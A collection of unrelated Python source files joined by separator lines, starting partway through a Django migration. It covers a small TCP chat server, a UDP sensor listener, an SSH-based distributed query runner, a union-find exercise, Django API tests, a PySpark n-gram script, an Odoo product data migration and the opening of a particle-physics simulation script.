('meta_copyright', models.CharField(blank=True, max_length=255, verbose_name='Copyright')),
('title_sw', models.CharField(blank=True, max_length=200, verbose_name='Title (sw)')),
('description_sw', models.TextField(blank=True, verbose_name='Description (sw)')),
],
options={
'verbose_name': 'Idea',
'verbose_name_plural': 'Ideas',
},
),
migrations.CreateModel(
name='Like',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('object_id', models.CharField(default='', help_text='Please enter the ID of the related object.', max_length=255, verbose_name='Related\tobject')),
('owner_object_id', models.CharField(default='', help_text='Please enter the ID of the related object.', max_length=255, verbose_name='Owner')),
('content_type', models.ForeignKey(help_text='Please select the type (model) for the relation, you want to build.', on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType', verbose_name="Related object's type (model)")),
('owner_content_type', models.ForeignKey(help_text='Please select the type (model) for the relation, you want to build.', on_delete=django.db.models.deletion.CASCADE, related_name='owner', to='contenttypes.ContentType', verbose_name="Owner's type (model)")),
],
options={
'verbose_name': 'Like',
'verbose_name_plural': 'Likes',
},
),
]
|
import socket
import json
class Colors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
host = '0.0.0.0'
port = 5000
size = 1024
x = 1
dictOfUsers = {}
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host,port))
s.listen(1)
while x == 1:
client, address = s.accept()
ADDRESS = json.dumps(address)
print('address: {}'.format(address))
Client = client.recv(size).decode().replace("'", '"')
Client = json.loads(Client)
print('{} connected and messege: {}'.format(Colors.OKBLUE + Colors.BOLD + Client['username'] + Colors.ENDC, Colors.OKGREEN + Client['message'] + Colors.ENDC))
dictOfUsers[Client['username']] = {
"ip": str(address[0]),
"port": str(address[1])
}
if Client['username'] == 'Admin':
if Client['to'] == 'Server':
if Client['message'] == '1':
client.send((str(dictOfUsers)).encode())
#elif Client:
elif Client:
#s.accept() = client, tuple(str(dictOfUsers[Client['to']]['ip']), int(dictOfUsers[Client['to']]['port']))
s.sendto('sdhfbds', (str(dictOfUsers[Client['to']]['ip']), int(dictOfUsers[Client['to']]['port'])))
client.send(('recieved').encode())
client.close()
|
# -*- coding:utf-8 -*-
# Author: Jorden Hai
#调用系统模块
import os
cmd_res = os.system("dir")#输出到屏幕上了 执行命令 结果不保存
print("-->",cmd_res) #cmd_res 值为0代表了成功
#把东西保存到某地址
cmd_res = os.popen("dir")
print("-->",cmd_res)
#加上 .read()方法读出
cmd_res = os.popen("dir").read()
print("-->",cmd_res)
#创建目录
os.mkdir("new_dir")
|
import socket
import time
from struct import unpack
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(('', 1234))
while 1:
data, (address, port) = s.recvfrom(68)
level = address.split('.')[-1] # last octett of IP is the level number
#drier = str(unpack('>H', data[4:6]))
#washingMachine = str(unpack('>H', data[6:8]))
#print washingMachine
#time.sleep(5)
print('address:', address)
print('port:', port)
print('level:', level)
print('data:', data)
drier, wahing_machine = unpack('>HH', data[4:8])
print('szaritogep:', drier)
print('mosogep:', wahing_machine)
print()
|
#!/usr/bin/env python
from __future__ import print_function
import os
import pipes
import tempfile
import shutil
import sys
import threading
KEEP_RESULTS=False
BASEDIR=None
# from https://stackoverflow.com/questions/5574702/how-to-print-to-stderr-in-python
def debug(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
def run_subprocess(cmd, stdin=None, wait=True):
import subprocess
import shlex
# if we are pushing cmd through the shell, we quote it
process = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
if wait:
stdout,stderr = process.communicate(stdin)
return stdout.strip(), stderr
else:
return "", ""
def cleanup():
if KEEP_RESULTS:
return
if BASEDIR:
shutil.rmtree(BASEDIR)
def setup_dirs():
global BASEDIR, RESULT_DIR, OUTPUT_DIR
global COMBINE_LOG, COMBINE_RESULTS
BASEDIR = tempfile.mkdtemp()
RESULT_DIR = os.path.join(BASEDIR, "results")
OUTPUT_DIR = os.path.join(BASEDIR, "output")
COMBINE_LOG = os.path.join(BASEDIR, "master.log")
COMBINE_RESULTS = os.path.join(BASEDIR, "master.results")
os.makedirs(RESULT_DIR)
os.makedirs(OUTPUT_DIR)
debug("collecting results in", BASEDIR)
def print_file(filename, title="", fd=sys.stdout, force=False):
filetype,err = run_subprocess("file '%s'" % filename)
filetype = filetype.lower()
if filetype.find("ascii") != -1 or filetype.find("unicode") != -1 or force:
with open(filename) as f:
filedata = f.read().strip()
if title:
debug(title)
print(filedata, file=fd)
def debug_file(filename, title):
return print_file(filename, title, fd=sys.stderr)
def write_to_file(filename, data):
with open(filename, "w") as f:
f.write(data or "")
def run_local_commands(cmd):
out,err = run_subprocess("%s %s" % (SYBIL_BIN, cmd))
print(out)
def check_connection(host):
full_cmd = "ssh -O check %s " % (host)
out, err = run_subprocess(full_cmd)
if err.find("running") != -1:
return
run_subprocess("ssh -O exit %s " % (host))
debug("NO MASTER RUNNING FOR HOST %s, STARTING MASTER" % host)
run_subprocess("ssh -C -N -n %s #master process" % host, wait=False)
import time
# when we check our connection, we'll wait up to a second while
# establishing it
incr = 0.1
steps = int(1 / incr)
for _ in xrange(steps):
time.sleep(incr)
out, err = run_subprocess(full_cmd)
if err.find("running") != -1:
break
def run_command_on_host(host, working_dir, bin):
check_connection(host)
query_flag_file = os.path.join(BASEDIR, "query_flags.gob")
with open(query_flag_file) as f:
query_flag_data = f.read()
full_cmd = "ssh -C %s \"cd \"%s\" && \"%s\" query -decode-flags\"" % (host, working_dir, bin)
out, err = run_subprocess(full_cmd, stdin=query_flag_data)
write_to_file(os.path.join(RESULT_DIR, "%s.results" % host), out)
write_to_file(os.path.join(OUTPUT_DIR, "%s.log" % host), err)
debug("%s finished" % host)
def run_remote_commands(cmd):
global HOST_FILE
debug("*** running command on remote hosts")
debug_file(HOST_FILE, "*** host info is")
query_flag_data, err = run_subprocess("%s %s -encode-flags -encode-results" % (SYBIL_BIN, cmd))
query_flag_file = os.path.join(BASEDIR, "query_flags.gob")
write_to_file(query_flag_file, query_flag_data)
threads = []
for line in HOSTINFO:
bin="sybil"
working_dir="~"
host = line[0]
if len(line) > 1:
working_dir = line[1]
if len(line) > 2:
bin = line[2]
t = threading.Thread(target=run_command_on_host, args=(host, working_dir, bin))
threads.append(t)
t.start()
for t in threads:
t.join()
def print_remote_results():
for line in HOSTINFO:
host = line[0]
log_file = os.path.join(OUTPUT_DIR, "%s.log" % host)
result_file = os.path.join(RESULT_DIR, "%s.results" % host)
debug_file(log_file, "*** %s output" % host)
debug_file(result_file, "*** %s output" % host)
def aggregate_remote_results():
full_cmd = "%s aggregate \"%s\"" % (SYBIL_BIN, RESULT_DIR)
query_flag_file = os.path.join(BASEDIR, "query_flags.gob")
with open(query_flag_file) as f:
query_flag_data = f.read()
out, err = run_subprocess(full_cmd, query_flag_data)
combine_log = os.path.join(OUTPUT_DIR, COMBINE_LOG)
combine_results = os.path.join(RESULT_DIR, COMBINE_RESULTS)
write_to_file(combine_results, out)
write_to_file(combine_log, err)
debug_file(combine_log, "*** aggregator output")
print_file(combine_results, "***combined results", force=True)
def read_host_info():
global HOSTINFO
global HOST_FILE
hostinfo = sys.stdin.readlines()
hosts = []
for line in hostinfo:
line = line.strip()
if line[0] == '#':
continue
hosts.append(line.split(" "))
HOSTINFO = hosts
debug("host info", hosts)
HOST_FILE = os.path.join(BASEDIR, "hosts")
with open(HOST_FILE, "w") as f:
for line in HOSTINFO:
f.write(" ".join(line))
f.write("\n")
def main():
global CMD
setup_dirs()
operator = None
if len(sys.argv) > 1:
operator = sys.argv[1]
cmd = " ".join(sys.argv[1:])
debug("command to run is: sybil %s" % cmd)
if operator == "query":
read_host_info()
run_remote_commands(cmd)
print_remote_results()
aggregate_remote_results()
else:
run_local_commands(cmd)
if "DEBUG" in os.environ:
KEEP_RESULTS=True
if __name__ == "__main__":
SYBIL_BIN, _ = run_subprocess("which sybil")
try:
main()
finally:
cleanup()
# vim: set syntax=python
|
"""
이코테 p298
학생들에게 0번에서 N번까지 번호 부여하였다.
처음에는 다 다른팀으로 분류되어 N+1팀이 존재한다.
선생님은 1. 팀합치기, 2. 같은팀 여부확인 연산을 사용할 수 있다.
M개의 연산을 수행할 때 같은팀 여부 확인 연산에 대한 연산 결과를 출력하는 프로그램을 작성하시오
같은팀 여부확인은 1 a b로 나타낼수 있다.
7 8
0 1 3
1 1 7
0 7 6
1 7 1
0 3 7
0 4 2
0 1 1
1 1 1
-> No
No
YES
### 서로소 문제가 떠오른다. 그걸로 풀어보자
"""
def find_parent(parent, x):
if parent[x] != x:
return find_parent(parent, parent[x])
return x
def union_parent(parent, a, b):
a = find_parent(parent, a)
b = find_parent(parent, b)
if a < b:
parent[b] = a
else:
parent[a] = b
def check_parent(parent, a, b):
if find_parent(parent, a) == find_parent(parent, b):
print("YES")
else:
print("NO")
# n : 학생수 m : 간선수
n, m = map(int, input().split())
parent = [0] * (n+1)
for i in range(n+1):
parent[i] = i
for _ in range(m):
check, a, b = map(int, input().split())
# 팀 합치기 (제일 앞선 사람의 번호로 합친다.)
if check == 0:
union_parent(parent, a, b)
# 같은팀 여부 확인
else:
check_parent(parent, a, b)
|
from math import isclose
from django.test import TestCase
from django.urls import reverse
from django.http import JsonResponse
from .views import getDataFrame
from .transform import top_ten
# Create your tests here.
DATA_FRAME = getDataFrame()
TOP_DEFAULT = {'peopleLikeYou': top_ten(DATA_FRAME)}
class LikeMeIndexTests(TestCase):
"LikeMeIndexTests is the default test project for the people-like-me route"
def test_should_return_json(self):
"the route should at the least return json matching the default sort order"
response = self.client.get(reverse('likeme:index'))
self.assertIs(response.status_code, 200)
self.assertIs(type(response), JsonResponse)
self.assertJSONEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
def test_should_query_by_name(self):
"here we look for Kendra and make sure that the first highest score result matches her name"
name = "Kendra"
response = self.client.get(reverse('likeme:index'), {"name": name})
self.assertIs(response.status_code, 200)
self.assertIs(type(response), JsonResponse)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_name = json[0]['name']
self.assertEqual(name, actual_name)
def test_should_query_by_age(self):
"search by age and test that the top result matches the age put in"
age = 30
response = self.client.get(reverse('likeme:index'), {"age": age})
self.assertIs(response.status_code, 200)
self.assertIs(type(response), JsonResponse)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_age = json[0]['age']
self.assertEqual(age, actual_age)
def test_should_return_empty_if_not_confident(self):
"if the probability is less than 0.4 do not return anything"
age = 1000
response = self.client.get(reverse('likeme:index'), {"age": age})
self.assertIs(response.status_code, 200)
self.assertIs(type(response), JsonResponse)
self.assertJSONEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
self.assertEqual(len(json), 0, 'expected no results')
def test_should_query_by_latitude(self):
"latitude query with test that the top result matches"
latitude = 40.71667
response = self.client.get(reverse('likeme:index'), {"latitude": latitude})
self.assertIs(response.status_code, 200)
self.assertIs(type(response), JsonResponse)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_latitude = json[0]['latitude']
self.assertEqual(latitude, actual_latitude)
def test_should_query_by_longitude(self):
"tests that the top result matches the exact longitude given"
longitude = 59.6818456
response = self.client.get(reverse('likeme:index'), {"longitude": longitude})
self.assertIs(response.status_code, 200)
self.assertIs(type(response), JsonResponse)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_longitude = json[0]['longitude']
self.assertEqual(longitude, actual_longitude)
def test_should_query_by_location(self):
"this is to ensure that when searching by both longitude & latitude we don't skew the results"
latitude = 44.8501354
longitude = -0.5702805
response = self.client.get(reverse('likeme:index'), {"longitude": longitude, "latitude": latitude})
self.assertIs(response.status_code, 200)
self.assertIs(type(response), JsonResponse)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_longitude = json[0]['longitude']
self.assertEqual(isclose(longitude, actual_longitude), True, 'asserted longitudes would match')
actual_latitude = json[0]['latitude']
self.assertEqual(latitude, actual_latitude, 'asserted that latitudes would match')
def test_should_query_by_monthly_income(self):
"test that monthly income returns the correct results"
income = 5132
response = self.client.get(reverse('likeme:index'), {"monthly income": income})
self.assertIs(response.status_code, 200)
self.assertIs(type(response), JsonResponse)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_income = json[0]['monthly income']
self.assertEqual(income, actual_income, 'asserted incomes would match')
def test_should_query_by_monthlyIncome(self):
"monthlyIncome can also be camel cased so we test that functionality works too"
income = 5132
response = self.client.get(reverse('likeme:index'), {"monthlyIncome": income})
self.assertIs(response.status_code, 200)
self.assertIs(type(response), JsonResponse)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_income = json[0]['monthly income']
self.assertEqual(income, actual_income, 'asserted incomes would match')
def test_should_query_by_experienced_True(self):
"make sure that the top result has experienced True"
response = self.client.get(reverse('likeme:index'), {"experienced": True})
self.assertIs(response.status_code, 200)
self.assertIs(type(response), JsonResponse)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_experience = json[0]['experienced']
self.assertEqual(True, actual_experience)
def test_should_query_by_experienced_False(self):
"make sure the top result has experienced False"
response = self.client.get(reverse('likeme:index'), {"experienced": False})
self.assertIs(response.status_code, 200)
self.assertIs(type(response), JsonResponse)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_experience = json[0]['experienced']
self.assertEqual(False, actual_experience)
def test_should_query_on_three_fields(self):
# Branden,67,-7.1765737,111.3828738,4681,false
age = 67
latitude = -7.1765737
longitude = 111.3828738
query = {
'age': age,
'latitude': latitude,
'longitude': longitude
}
response = self.client.get(reverse('likeme:index'), query)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_longitude = json[0]['longitude']
self.assertEqual(isclose(longitude, actual_longitude), True, 'asserted longitudes would match')
actual_latitude = json[0]['latitude']
self.assertEqual(isclose(latitude, actual_latitude), True, 'asserted that latitudes would match')
actual_age = json[0]['age']
self.assertEqual(age, actual_age)
def test_should_query_on_four_fields(self):
# Glynis,70,27.756647,118.035309,14424,true
age = 70
latitude = 27.756647
longitude = 118.035309
income = 14424
query = {
'age': age,
'latitude': latitude,
'longitude': longitude,
'income': income
}
response = self.client.get(reverse('likeme:index'), query)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_longitude = json[0]['longitude']
self.assertEqual(isclose(longitude, actual_longitude), True, 'asserted longitudes would match')
actual_latitude = json[0]['latitude']
self.assertEqual(isclose(latitude, actual_latitude), True, 'asserted that latitudes would match')
actual_age = json[0]['age']
self.assertEqual(age, actual_age)
actual_income = json[0]['monthly income']
self.assertEqual(income, actual_income)
def test_should_query_on_five_fields(self):
# Jay,92,-22.9916783,-45.5651683,3476,true
age = 92
latitude = -22.9916783
longitude = -45.5651683
income = 3476
name = "Jay"
query = {
'name': name,
'age': age,
'latitude': latitude,
'longitude': longitude,
'income': income
}
response = self.client.get(reverse('likeme:index'), query)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_longitude = json[0]['longitude']
self.assertEqual(isclose(longitude, actual_longitude), True, 'asserted longitudes would match')
actual_latitude = json[0]['latitude']
self.assertEqual(isclose(latitude, actual_latitude), True, 'asserted that latitudes would match')
actual_age = json[0]['age']
self.assertEqual(age, actual_age)
actual_income = json[0]['monthly income']
self.assertEqual(income, actual_income)
actual_name = json[0]['name']
self.assertEqual(name, actual_name)
def test_should_query_on_six_fields(self):
# Lexis,80,0.5128922,-77.2864879,3839,false
age = 80
latitude = 0.5128922
longitude = -77.2864879
income = 3839
name = "Lexis"
experienced = "false"
query = {
'name': name,
'age': age,
'latitude': latitude,
'longitude': longitude,
'income': income,
'experienced': experienced
}
response = self.client.get(reverse('likeme:index'), query)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_longitude = json[0]['longitude']
self.assertEqual(isclose(longitude, actual_longitude), True, 'asserted longitudes would match')
actual_latitude = json[0]['latitude']
self.assertEqual(isclose(latitude, actual_latitude), True, 'asserted that latitudes would match')
actual_age = json[0]['age']
self.assertEqual(age, actual_age)
actual_income = json[0]['monthly income']
self.assertEqual(income, actual_income)
actual_name = json[0]['name']
self.assertEqual(name, actual_name)
actual_experience = json[0]['experienced']
self.assertEqual(False, actual_experience)
def test_should_ignore_extra_fields(self):
# Lexis,80,0.5128922,-77.2864879,3839,false
age = 80
latitude = 0.5128922
longitude = -77.2864879
income = 3839
name = "Lexis"
experienced = "false"
query = {
'name': name,
'age': age,
'latitude': latitude,
'longitude': longitude,
'income': income,
'experienced': experienced,
'extra': 'field',
'more': 'fields'
}
response = self.client.get(reverse('likeme:index'), query)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_longitude = json[0]['longitude']
self.assertEqual(isclose(longitude, actual_longitude), True, 'asserted longitudes would match')
actual_latitude = json[0]['latitude']
self.assertEqual(isclose(latitude, actual_latitude), True, 'asserted that latitudes would match')
actual_age = json[0]['age']
self.assertEqual(age, actual_age)
actual_income = json[0]['monthly income']
self.assertEqual(income, actual_income)
actual_name = json[0]['name']
self.assertEqual(name, actual_name)
actual_experience = json[0]['experienced']
self.assertEqual(False, actual_experience)
|
import json
import requests
print('Loading function')
def lambda_handler(event, context):
print("Received event: " + json.dumps(event, indent=2))
r = requests.get('http://google.com')
print(r.text[:100])
# print("val1 = " + event['key1'])
# print("val2 = " + event['key2'])
# print("val3 = " + event['key3'])
# print('aaa: ', event['aaa'])
# print(event)
# return event['key1'] # Echo back the first key value
#raise Exception('Something went wrong')
return 'Hello WorldAAAAAAAAA!!!!'
|
# As Flask creates own instances of given classes, dependency injection is challenging.
# It could either be provided using kwargs or using this injector
from control.WorkerControl import WorkerControl
from data.StorageIO import StorageIO
from data.ArchitectureIO import ArchitecureIO
class Injector:
workerControl: WorkerControl = None
storageIO: StorageIO = None
architectureIO: ArchitecureIO = None
@staticmethod
def inject(workerCont: WorkerControl, storage:StorageIO, architec: ArchitecureIO):
Injector.workerControl = workerCont
Injector.storageIO = storage
Injector.architectureIO = architec
|
import torch
import torch.nn.functional as F
from torch.utils.data import DataLoader
from transformers import Trainer
import numpy as np
import itertools
from tqdm import trange
import pickle
import json
import os
import logging
logger = logging.getLogger("sequence_tagger_auto")
class TextClassifier:
def __init__(
self,
auto_model,
bpe_tokenizer,
max_len=192,
pred_loader_args={"num_workers": 1},
pred_batch_size=100,
training_args=None,
trainer=None,
):
super().__init__()
self._auto_model = auto_model
self._bpe_tokenizer = bpe_tokenizer
self._pred_loader_args = pred_loader_args
self._pred_batch_size = pred_batch_size
self._training_args = training_args
self._trainer = trainer
self._named_parameters = auto_model.named_parameters
def predict(self, eval_dataset, evaluate=False, metrics=None):
if metrics is None:
metrics = []
self._auto_model.eval()
logits, _, metrics = self._trainer.predict(eval_dataset)
probs = F.softmax(torch.tensor(logits), dim=1).numpy()
preds = np.argmax(probs, axis=1)
print(metrics)
return preds, probs
|
n = int(input("max range ="))
for i in range(1, n):
print(i)
for i in range(1,n+1):
if(i%2==0):
print("even int", i)
for i in range(n+1):
if(i%2==1):
print("odd int", i)
|
import random
import timeit
_test_data = [
([1, 3, -5, 3, 3, 2, -9, -2], 8),
([31, -41, 59, 26, -53, 58, 97, -93, -23], 187),
([31, -41, 259, 26, -453, 58, 97, -93, -23], 285),
([41, -31, 59, -97, -53, -58, 26], 69),
([-97, 41, -31, 59, -97, -53, -58, 26], 69),
([31, -41, 59, 26, -53, 58, 97], 187),
([31, -41, 59, 26, -53, 58, 97, -1], 187),
([2, -10, 8, -10, 2], 8),
([41, -31, -59, -26, -13], 41),
([-31, -59, -26, -13, 47], 47),
([12], 12),
([1], 1),
([0], 0),
([-12], 0),
([-1], 0),
([-31, -59, -26, -13, -47], 0),
([], 0)
]
def run_tests(func, output=True):
"""
runs a set of tests als specified in variable _test_data: tuples of a list of values and the expected result
@param func: max_sub_array solution to test, func is expected to accept a parameter of type list
and to return the maximum sum of a sub array found
optionally followed by further parameters being ignored by the test
@param output: boolean parameter stating whether results should be written to console
@return: boolean value indicating whether all tests have run successful
"""
if output:
print('testing function ', func.__name__, end='')
ok = True
for values, res in _test_data:
try:
r = func(values)
except BaseException as e:
r = e
if type(r) == list or type(r) == tuple:
r = r[0]
if r != res:
if output:
print('\n\ttesting with', values, 'expecting', res, 'got', r, end='')
ok = False
if output:
print(' -- ok' if ok else '\n')
return ok
_rand_data_storage = dict()
def _rand_data(n):
if n not in _rand_data_storage:
_rand_data_storage[n] = [random.randint(-100, 100) for _ in range(n)]
return _rand_data_storage[n]
def measure_times(func, last_result_only=False, number=1):
"""
Runs func on successively growing data (amount doubled for each run) and measures time for comparison
:param func: function to measure times for
:param number: number of runs per measurement (default: 1 because of long duration with large data already)
:return: None
"""
print('\nMeasuring time of ', func.__name__)
n = 10
data = _rand_data(n)
t1 = timeit.timeit(lambda: func(data), number=number)
if not last_result_only:
print(n, ' values: ', t1, 'sec')
while t1 < 10 and n < 1000000:
n *= 2
t0 = t1
data = _rand_data(n)
t1 = timeit.timeit(lambda: func(data), number=number)
if not last_result_only:
print(n, ' values: ', t1, 'sec, ratio: ', t1 / t0)
if last_result_only:
print(n, ' values: ', t1, 'sec, ratio: ', t1 / t0)
|
__version__ = "0.1.0"
from .wrapper import Kadena
|
# This codes cleans out the text features and
# computes bigrams and trigrams for them
from operator import add
from pyspark.ml.feature import NGram, StopWordsRemover
from pyspark.sql import SQLContext
from pyspark.sql.functions import udf
from pyspark.sql.types import ArrayType, StringType
from pyspark import SparkConf, SparkContext
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
conf = SparkConf().setAppName("Computing ngrams for a few million tweets")
sc = SparkContext(conf=conf)
spark = SQLContext(sc)
dd = sc.textFile('preprocessed_tweets.csv').map(lambda x: x.split(',', 1)).map(lambda x: (x[0], x[1].split()))
df = dd.toDF(['username', 'tweets'])
def remove_l_c_words(df, least, most):
# Let's find out which words we keep
vocabulary = df.map(lambda row: row.tweets).reduce(lambda x,y: x+y)
count = sc.parallelize(vocabulary).map(lambda word: (word, 1)).reduceByKey(add)
count = count.sortBy(lambda wc: wc[1], ascending=False)
# Add to the list of stopwords
stop_words_lc = count.filter(lambda wc: wc[1] == least).map(lambda wc: wc[0]).collect()
if most < 1:
stop_words = stop_words_lc
else:
stop_words_mc = count.map(lambda wc: wc[0]).take(most)
stop_words = stop_words_lc + stop_words_mc
remover = StopWordsRemover(inputCol="tweets", outputCol='cleaned_tweets', stopWords=stop_words)
return remover.transform(df)
df = remove_l_c_words(df, least=1, most=50)
# Let's create the bigrams and trigrams
bigrams = NGram(n=2, inputCol='cleaned_tweets', outputCol='bigrams')
trigrams = NGram(n=3, inputCol='cleaned_tweets', outputCol='trigrams')
df = bigrams.transform(df)
ngramDF = trigrams.transform(df)
def add_col(x, y, z):
return x + y + z
udf_concat = udf(add_col, ArrayType(StringType()))
final_df = ngramDF.withColumn("total", udf_concat("cleaned_tweets", "bigrams", "trigrams")).select('username', 'total').toDF('username', 'tweets')
df_to_save = remove_l_c_words(final_df, least=1, most=0).select('username', 'cleaned_tweets').rdd
df_to_save = df_to_save.map(lambda row: (row.username, ",".join(row.cleaned_tweets)))
df_to_save.map(lambda x: "|".join(x)).saveAsTextFile('ngrams_tweets')
|
x = input("Name = ")
fi = "file1.txt"
file = open(fi ,'w')
file.write(x)
file.close()
file = open(fi , 'r')
file3 = file.read()
#print(file3)
file.close()
xd = "file4.txt"
file = open(xd,'w')
file.write(file3)
file.close()
|
from sympy import *
import numpy as num
import cmath
def mainFunc(function):
expr = sympify(function)
x = var('x')
sol = solve(expr, x)
if sol==LambertW(1):
sol=0.5671432904097
for solut in sol:
try:
print('\n Exact root is: %0.8f' % solut)
return '%0.6f' % solut
except:
continue
|
def get_string():
string = str(input("Give me a string to reverse the word order: "))
return string
def rWordOrder(string):
split_string = string.split()
reverse_string = split_string[::-1]
reverse_order_string = " ".join(reverse_string)
return reverse_order_string
print(get_string())
print(rWordOrder(get_string()))
|
# -*- coding: utf-8 -*-
from api import source_data, destination_data, destination_api, source_api
from sql import PRODUCT_CATEGORY_SELECT, PRODUCT_CATEGORY_INSERT, PRODUCT_IR_PROPERTY_INSERT, PRODUCT_PRODUCT_INSERT, \
PRODUCT_PRODUCT_SELECT, PRODUCT_TEMPLATE_INSERT, PRODUCT_TEMPLATE_SELECT
# source_cur = source_data.cursor()
# destination_cur = destination_data.cursor()
#
# source_cur.execute(PRODUCT_CATEGORY_SELECT)
# categories = source_cur.fetchall()
#
# destination_cur.execute("DELETE FROM product_template where id > 1")
# destination_cur.execute("DELETE FROM product_product where id > 1")
# destination_cur.execute("DELETE FROM product_category where id > 2")
# destination_cur.execute("DELETE FROM ir_property where res_id like 'product.template,%'")
# destination_data.commit()
#
# for category in categories:
# destination_cur.execute(PRODUCT_CATEGORY_INSERT, category)
#
# destination_data.commit()
#
# count = 0
# for category in categories:
# parent_id = False
# if category["parent_id"]:
# parent_id = category["parent_id"]
#
# scat = source_api.browse("product.category", category["id"], context={"lang": "es_DO"})
# destination_api.write("product.category", category["id"], {"property_stock_account_input_categ": 179,
# "property_stock_valuation_account_id": 87,
# "property_stock_account_output_categ": 184,
# "parent_id": parent_id,
# "name": scat.name})
# count += 1
# print count
#
#
# source_cur.execute(PRODUCT_TEMPLATE_SELECT)
# products = source_cur.fetchall()
#
# count = 1
# products_ids = []
# for prod in products:
# products_ids.append(prod["id"])
# destination_cur.execute(PRODUCT_TEMPLATE_INSERT, prod)
# count += 1
# print count
#
# destination_data.commit()
#
# source_cur.execute(PRODUCT_PRODUCT_SELECT)
# products = source_cur.fetchall()
#
# for prod in products:
# destination_cur.execute(PRODUCT_PRODUCT_INSERT, prod)
# count += 1
# print count
#
# for id in products_ids:
# sql = """INSERT INTO "ir_property"
# (
# "id",
# "value_text",
# "name",
# "type",
# "company_id",
# "fields_id",
# "res_id",
# "create_uid",
# "write_uid",
# "create_date",
# "write_date"
# )
# VALUES
# (
# Nextval('ir_property_id_seq'),
# 'real_time',
# 'valuation',
# 'selection',
# 1,
# 4160,
# %(product_template)s,
# 1,
# 1,
# (Now() at time zone 'UTC'),
# (Now() at time zone 'UTC')
# )
# returning id
# """
#
# sql2 = """
# INSERT INTO "ir_property"
# (
# "id",
# "value_text",
# "name",
# "type",
# "company_id",
# "fields_id",
# "res_id",
# "create_uid",
# "write_uid",
# "create_date",
# "write_date"
# )
# VALUES
# (
# Nextval('ir_property_id_seq'),
# 'average',
# 'cost_method',
# 'selection',
# 1,
# 4162,
# %(product_template)s,
# 1,
# 1,
# (Now() at time zone 'UTC'),
# (Now() at time zone 'UTC')
# )
# returning id
#
# """
#
# destination_cur.execute(sql, dict(product_template="product.template,{}".format(id)))
# destination_cur.execute(sql2, dict(product_template="product.template,{}".format(id)))
# destination_cur.execute("insert into product_supplier_taxes_rel (prod_id,tax_id) values (%(id)s, 8)", dict(id=id))
# destination_cur.execute("insert into product_supplier_taxes_rel (prod_id,tax_id) values (%(id)s, 5)", dict(id=id))
# destination_cur.execute("insert into product_taxes_rel (prod_id,tax_id) values (%(id)s, 19)", dict(id=id))
#
# destination_data.commit()
#
#
#
#
# destination_data.close()
# source_data.close()
products = destination_api.search("product.template", [])
count = 1
for product in products:
prod = source_api.read("product.template", product, ["standard_price"])
destination_api.write("product.template", product, {"valuation": "real_time",
"type": "product",
"cost_method": "average",
"standard_price": prod["standard_price"]})
count += 1
print "update {}".format(count)
|
#!/usr/bin/env python
from __future__ import print_function
import fastjet as fj
import fjcontrib
import fjext
import tqdm
import argparse
import os
import numpy as np
from heppy.pythiautils import configuration as pyconf
import pythia8
import pythiafjext
import pythiaext
from pyjetty.mputils import logbins, linbins
import ROOT
ROOT.gROOT.SetBatch(True)
def part_int_h2(h2):
h2i = h2.Clone(h2.GetName() + '_pint')
h2i.Reset()
for ipt in range(1, h2.GetNbinsX()+1):
for ir in range(1, h2.GetNbinsY()+1):
hint = h2.Integral(ipt, ipt, 1, ir, 'width')
# hint = h2.Integral(ipt, ipt, 1, ir)
h2i.SetBinContent(ipt, ir, hint)
h2i.SetBinError(ipt, ir, ROOT.TMath.Sqrt(hint))
hptint = h2.Integral(ipt, ipt, 1, h2.GetNbinsY()+1, 'width')
for ir in range(1, h2.GetNbinsY()+1):
nval = h2i.GetBinContent(ipt, ir) / hptint
h2i.SetBinContent(ipt, ir, nval)
h2i.SetBinError(ipt, ir, 0)
return h2i
def main():
parser = argparse.ArgumentParser(description='pythia8 fastjet on the fly', prog=os.path.basename(__file__))
pyconf.add_standard_pythia_args(parser)
parser.add_argument('--ignore-mycfg', help="ignore some settings hardcoded here", default=True, action='store_true')
parser.add_argument('--part-info', help="attach particle info to psj", default=False, action='store_true')
parser.add_argument('--output', help="output file name", default='snowmass21_sim.root', type=str)
args = parser.parse_args()
# print the banner first
fj.ClusterSequence.print_banner()
